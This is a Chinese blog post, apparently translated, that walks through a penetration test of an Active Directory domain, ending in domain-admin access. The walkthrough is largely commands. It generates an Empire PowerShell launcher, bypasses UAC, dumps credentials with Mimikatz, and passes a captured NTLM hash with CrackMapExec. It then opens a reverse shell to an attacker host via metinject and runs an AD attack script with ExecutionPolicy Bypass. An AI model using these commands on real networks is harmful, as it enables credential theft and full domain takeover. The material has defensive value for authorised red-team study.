使用Empire进行域渗透

0x01 前言

文章来源于
https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/
Empire主要针对后渗透,我的建议是对于redteam来说,SSL加密是必须的,CS自带的有这个功能,不过是专业版才有,La1y弄的那个好像支持。

0x02

我现在收集了本地用户凭据并升级到本地管理员,我的下一步目标是想要拿到DC权限。由于我是本地管理员,我可以使用Bloodhound,它将帮我画出整个域并显示我的下一个目标的位置。在我的Windows主机上运行Bloodhound之后(wiki:https://github.com/BloodHoundAD/Bloodhound/wiki),然后我确定了域管理员Jaddmon登录的服务器是2008R2SERV。

ps:Bloodhound怎么玩?看这里
我的第一步是尝试使用Crackmapexec来调用Mimikatz并转储凭据,但是这台机器上的SMB不允许登录,所以我必须找到另一种方法。

由于我拥有本地管理员权限,因此我继续将RDP引入服务器,然后我使用Empire在服务器上获得一个shell。

使用Empire很简单:启动之后,然后启动一个监听器,如下所示


然后生成payload:

launcher powershell http

生成一个powershell payload,开始监听。

我复制这个命令,切换到RDP会话,打开命令提示符并粘贴它。


当它运行时,我在Empire看到我现在在那台机器上有一个代理。


要与它进行交互,我先输入:

agents

然后:

interact VLLRZY4EC (代理的name)

即使我是本地管理员,我仍然必须绕过UAC。幸运的是,Empire有一个模块。然后输入:

usemodule privesc/bypassuac
set Listener http

然后我在机器上获得另一个代理,然后我再次与该新代理进行交互。

下面就是dump 一些凭证:

mimikatz

creds

然后我看到域管理员哈希密码。

我不会破解密码,因为这很简单。相反,我将使用Crackmapexec传递哈希值。
然后就是通过crackmapexec:

crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares


成功!
你也可以用它来得到一个shell

crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST = 192.168.1.63 LPORT = 4443

msf开启监听:

拿到DC权限:

0x03 总结

这是利用Active Directory配置错误进入域管理员的众多方法之一 。如前所述,这不是渗透测试的结束。我接下来的步骤是尝试其他方法来访问域管理员或任何其他帐户,因为进行了渗透测试是要发现网络中的所有bug,而不仅仅是一个漏洞。

0x04 彩蛋

最后,推荐这个博主的一个Active Directory评估和权限提升脚本
https://github.com/hausec/ADAPE-Script/tree/master

功能如下:

  • 通过WPAD,LLMNR和NBT-NS欺骗收集哈希值
  • 检查GPP密码(MS14-025)
  • 绘制域并通过BloodHound识别目标
  • 检查权限提升方法
  • 在网络上搜索开放的SMB共享
  • 搜索敏感文件和字符串的这些共享和其他可访问目录
  • 检查网络上的系统补丁
  • 搜索文件服务器
  • 搜索附加票据
  • 收集域策略
PowerShell.exe -ExecutionPolicy Bypass ./ADAPE.ps1

以及github上一个大牛整合的cs脚本,skr。

https://github.com/invokethreatguy/CSASC

体验完这些脚本我可能会总结一下,以及cna的开发。


   转载规则


《使用Empire进行域渗透》 Wing 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
利用C++和C#逃避AV检测 利用C++和C#逃避AV检测
本文主要内容是在目标机器上生成反向shell的不同方法的技术概述。 简介2017年12月,窝写了一篇关于在内存中执行PowerShell脚本,从而达到一些可能的内部攻击的文章,这些脚本在几个月前没有被主要的杀毒软件检测到。在这几个月中
2018-10-24
下一篇 
Dump域内用户Hash姿势集合 Dump域内用户Hash姿势集合
如何Dump域内的Hash原文地址:https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ps:上一篇提权那篇译文,backlion说有实际操作就更好了,所以这
2018-08-05
  目录